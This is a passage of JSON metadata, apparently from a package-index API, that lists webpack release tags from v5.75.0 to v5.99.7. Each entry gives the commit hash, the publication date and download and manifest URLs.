c08f9d058a95da6","kind":"commit","published_at":"2025-04-25T10:47:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7/manifests"},{"name":"v5.99.6","sha":"f8eee102c20a3d79eddfed0194113c4d5759d9e4","kind":"commit","published_at":"2025-04-18T12:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6/manifests"},{"name":"v5.99.5","sha":"70e3d9d5dbd3548431b8878dead4647beff5c14f","kind":"commit","published_at":"2025-04-08T22:43:57.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5/manifests"},{"name":"v5.99.4","sha":"04e00736b03eee0fabfd32eee5323ddc3701083f","kind":"commit","published_at":"2025-04-08T20:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4/manifests"},{"name":"v5.99.3","sha":"2470d8e74c8b647203063826cae1ea5e691726a9","kind":"commit","published_at":"2025-04-08T14:49:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3/manifests"},{"name":"v5.99.2","sha":"44da94f433c4adeb7ac56abc69df2b0f8a213486","kind":"commit","published_at":"2025-04-08T07:17:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2/manifests"},{"name":"v5.99.1","sha":"2b2b705cc5c53594adf5adebca55f7273a1615c9","kind":"commit","published_at":"2025-04-07T22:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1/manifests"},{"name":"v5.99.0","sha":"1bd06e333346656ef6542e36478f02055cab7369","kind":"commit","published_at":"2025-04-07T13:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0/manifests"},{"name":"v5.98.0","sha":"f1bdec5cc70236083e45b665831d5d79d6485db7","kind":"tag","published_at":"2025-02-12T20:10:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.98.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.98.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.98.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0/manifests"},{"name":"v5.97.1","sha":"3612d36e44bda5644dc3b353e2cade7fe442ba59","kind":"commit","published_at":"2024-12-05T14:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1/manifests"},{"name":"v5.97.0","sha":"644f1d12716ba8f3c96d2efa279262560dd8c7fb","kind":"commit","published_at":"2024-12-03T11:06:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0/manifests"},{"name":"v5.96.1","sha":"d4ced7322229c7d72a7a0d2ca955bdde0c910a0b","kind":"commit","published_at":"2024-11-01T10:59:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1/manifests"},{"name":"v5.96.0","sha":"aff0c3ed2b31ed16ce8738e02f4b8f97966833f4","kind":"commit","published_at":"2024-10-31T22:01:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0/manifests"},{"name":"v5.95.0","sha":"e20fd634fd24fab2c821a6e6114ace706ca052d0","kind":"commit","published_at":"2024-09-25T14:13:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.95.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.95.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.95.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0/manifests"},{"name":"v5.94.0","sha":"eabf85d8580dfcb876b56957ba5488222a4f7873","kind":"commit","published_at":"2024-08-22T13:02:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.94.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.94.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.94.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0/manifests"},{"name":"v5.93.0","sha":"277460b33bcc49c51acbbcd688672aa4ec685732","kind":"commit","published_at":"2024-07-11T18:28:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.93.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.93.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.93.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0/manifests"},{"name":"v5.92.1","sha":"a82e0cd00e26d8452295f0d680417e4656a6d7cc","kind":"commit","published_at":"2024-06-19T16:19:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1/manifests"},{"name":"v5.92.0","sha":"34e2561addb0f65a7a6fb0ce7ae1aea4cd1d599f","kind":"commit","published_at":"2024-06-11T14:50:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0/manifests"},{"name":"v5.91.0","sha":"60daca54105f89eee45e118fd0bbc820730724ee","kind":"commit","published_at":"2024-03-20T16:11:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.91.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.91.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.91.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0/manifests"},{"name":"v5.90.3","sha":"651b3d66d10d54da31d4cb7123ea74d10f1f5456","kind":"commit","published_at":"2024-02-19T12:32:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3/manifests"},{"name":"v5.90.2","sha":"11c1be3d0838e8de31900aacabcd449e9da77eaf","kind":"commit","published_at":"2024-02-15T14:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2/manifests"},{"name":"v5.90.1","sha":"08770761c8c7aa1e6e18b77d3deee8cc9871bd87","kind":"commit","published_at":"2024-02-01T17:09:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1/manifests"},{"name":"v5.90.0","sha":"4a2662381ed8e6a9d849b494511459f5858d4e82","kind":"commit","published_at":"2024-01-24T13:09:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0/manifests"},{"name":"v5.89.0","sha":"87660921808566ef3b8796f8df61bd79fc026108","kind":"tag","published_at":"2023-10-13T22:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.89.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.89.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.89.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0/manifests"},{"name":"v4.47.0","sha":"dfffd6a241bf1d593b3fd31b4b279f96f4a4aab1","kind":"tag","published_at":"2023-09-06T17:15:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0/manifests"},{"name":"v5.88.2","sha":"1f99ad6367f2b8a6ef17cce0e058f7a67fb7db18","kind":"tag","published_at":"2023-07-12T18:15:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2/manifests"},{"name":"v5.88.1","sha":"6be4065ade1e252c1d8dcba4af0f43e32af1bdc1","kind":"tag","published_at":"2023-06-28T16:34:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1/manifests"},{"name":"v5.88.0","sha":"1e18b1d1c74e26a84e9adee519c045e2d8ed40a4","kind":"tag","published_at":"2023-06-21T18:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0/manifests"},{"name":"v5.87.0","sha":"8e0e0eb47d47fe33e4c9ef9bc455d9584f7ea92c","kind":"tag","published_at":"2023-06-14T18:24:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.87.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.87.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.87.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0/manifests"},{"name":"v5.86.0","sha":"2dc8755dc40e24e3ba5760e96738b74990116711","kind":"tag","published_at":"2023-06-07T15:13:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.86.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.86.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.86.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0/manifests"},{"name":"v5.85.1","sha":"f0f0dd548871566c77c69cdf3d00eaf0faf9a5cd","kind":"tag","published_at":"2023-06-05T14:30:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1/manifests"},{"name":"v5.85.0","sha":"c80b069dca8eedebfa8ede9ce740891362fdb8bf","kind":"tag","published_at":"2023-05-31T19:20:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0/manifests"},{"name":"v5.84.1","sha":"71d9a21c32974b5166f9ce2f5549849d0c7ad310","kind":"tag","published_at":"2023-05-25T18:35:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1/manifests"},{"name":"v5.84.0","sha":"4d4caf13add84f996790e5bbdf79b66a548f8273","kind":"tag","published_at":"2023-05-24T17:00:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0/manifests"},{"name":"v5.83.1","sha":"81c8fbde2e0e4b8d2e30a5109dedc082ef8c09dc","kind":"tag","published_at":"2023-05-17T20:22:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1/manifests"},{"name":"v5.83.0","sha":"ccb3b860520c9472eff3d411a48105f882cf482a","kind":"tag","published_at":"2023-05-17T15:29:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0/manifests"},{"name":"v5.82.1","sha":"a8fd8b7598e8a599871765e0167cacf8318944a9","kind":"tag","published_at":"2023-05-10T15:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1/manifests"},{"name":"v5.82.0","sha":"1018ca80b31ea72436510398cca5be335b6ac81c","kind":"tag","published_at":"2023-05-03T17:03:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0/manifests"},{"name":"v5.81.0","sha":"5c016a8ec1bbfd73a7fc20d4b474938e61ee3a57","kind":"tag","published_at":"2023-04-26T14:41:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.81.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0/manifests"},{"name":"v5.80.0","sha":"9ac1728ee359efbbd1eb317f4a12c0f8136a690e","kind":"tag","published_at":"2023-04-19T16:56:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.80.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0/manifests"},{"name":"v5.79.0","sha":"ecdcc1a1d02a3097acb9ebc0896365ae1f4d25e2","kind":"tag","published_at":"2023-04-12T15:12:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.79.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0/manifests"},{"name":"v5.78.0","sha":"e51f8347026588c90f9bd91681597e97f24f40c9","kind":"tag","published_at":"2023-04-05T18:09:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.78.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0/manifests"},{"name":"v5.77.0","sha":"263f29189060529198b7ab4dbddfd2dca46bd96e","kind":"tag","published_at":"2023-03-29T14:19:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.77.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0/manifests"},{"name":"v5.76.3","sha":"8ac9616280aebfb61ae7484f06ad1979d73e6a56","kind":"tag","published_at":"2023-03-22T14:59:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3/manifests"},{"name":"v5.76.2","sha":"dbf7bf39ab96e1462603435c150d601bb69ebe4e","kind":"tag","published_at":"2023-03-15T15:00:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2/manifests"},{"name":"v5.76.1","sha":"21be52b681c477f8ebc41c1b0e7a7a8ac4fa7008","kind":"commit","published_at":"2023-03-10T22:59:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1/manifests"},{"name":"v5.76.0","sha":"97b1718720c33f1b17302a74c5284b01e02ec001","kind":"commit","published_at":"2023-03-08T17:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0/manifests"},{"name":"v5.75.0","sha":"8241da7f1e75c5581ba535d127fa66aeb9eb2ac8","kind":"tag","published_at":"2022-11-09T15:27:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.75.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.75.0","dependenc